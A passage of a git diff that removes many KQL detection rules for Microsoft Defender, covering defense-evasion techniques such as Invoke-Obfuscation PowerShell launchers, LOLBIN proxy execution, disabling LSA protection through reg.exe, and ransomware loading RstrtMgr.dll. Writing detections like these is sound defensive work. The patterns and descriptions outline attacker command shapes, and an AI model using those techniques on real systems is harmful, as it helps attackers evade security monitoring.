-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql
deleted file mode 100644
index cce1ac92..00000000
--- a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/15
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql
deleted file mode 100644
index 833625c5..00000000
--- a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/11/24
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql b/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql
deleted file mode 100644
index 3f8cac71..00000000
--- a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: medium
-// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql b/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql
deleted file mode 100644
index 11e34eff..00000000
--- a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: low
-// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s "))
\ No newline at end of file
diff --git a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql b/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql
deleted file mode 100644
index 5c46388e..00000000
--- a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020/04/21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql b/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql
deleted file mode 100644
index f419e936..00000000
--- a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
-
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql
deleted file mode 100644
index 4af2d38a..00000000
--- a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
deleted file mode 100644
index b42471c1..00000000
--- a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
deleted file mode 100644
index c693d26a..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019/11/08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql
deleted file mode 100644
index 4108ea3f..00000000
--- a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
deleted file mode 100644
index e1957d0c..00000000
--- a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql
deleted file mode 100644
index c5c03061..00000000
--- a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql b/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql
deleted file mode 100644
index c7d99e0d..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql
deleted file mode 100644
index b66ecade..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql
deleted file mode 100644
index 7041f5ee..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/Defense Evasion/JScript_Compiler_Execution.kql b/Defense Evasion/JScript_Compiler_Execution.kql
deleted file mode 100644
index 5249425a..00000000
--- a/Defense Evasion/JScript_Compiler_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/05/02
-// Level: low
-// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
-Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
-
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql b/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql
deleted file mode 100644
index 1aa5330d..00000000
--- a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/01
-// Level: high
-// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\kavremover.exe" or InitiatingProcessFolderPath endswith "\\cleanapi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql b/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql
deleted file mode 100644
index 66c34716..00000000
--- a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql b/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql
deleted file mode 100644
index 9661cd24..00000000
--- a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/29
-// Level: high
-// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
-
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql b/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql
deleted file mode 100644
index 3a052bf3..00000000
--- a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/22
-// Level: high
-// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
-// Tags: attack.defense_evasion, attack.t1562.010
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql b/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql
deleted file mode 100644
index 6b429c52..00000000
--- a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
-// Tags: attack.defense_evasion, attack.t1216.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql b/Defense Evasion/Legitimate_Application_Dropped_Archive.kql
deleted file mode 100644
index 61f36222..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write an archive to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql b/Defense Evasion/Legitimate_Application_Dropped_Executable.kql
deleted file mode 100644
index 7435b284..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write executables to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Script.kql b/Defense Evasion/Legitimate_Application_Dropped_Script.kql
deleted file mode 100644
index 73e265bc..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write scripts to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Driver_Creation.kql b/Defense Evasion/LiveKD_Driver_Creation.kql
deleted file mode 100644
index 7e5f529f..00000000
--- a/Defense Evasion/LiveKD_Driver_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 69e1685e..00000000
--- a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql
deleted file mode 100644
index 003653f9..00000000
--- a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
deleted file mode 100644
index 815998df..00000000
--- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
deleted file mode 100644
index c3b92be9..00000000
--- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql
deleted file mode 100644
index aa25bb7b..00000000
--- a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
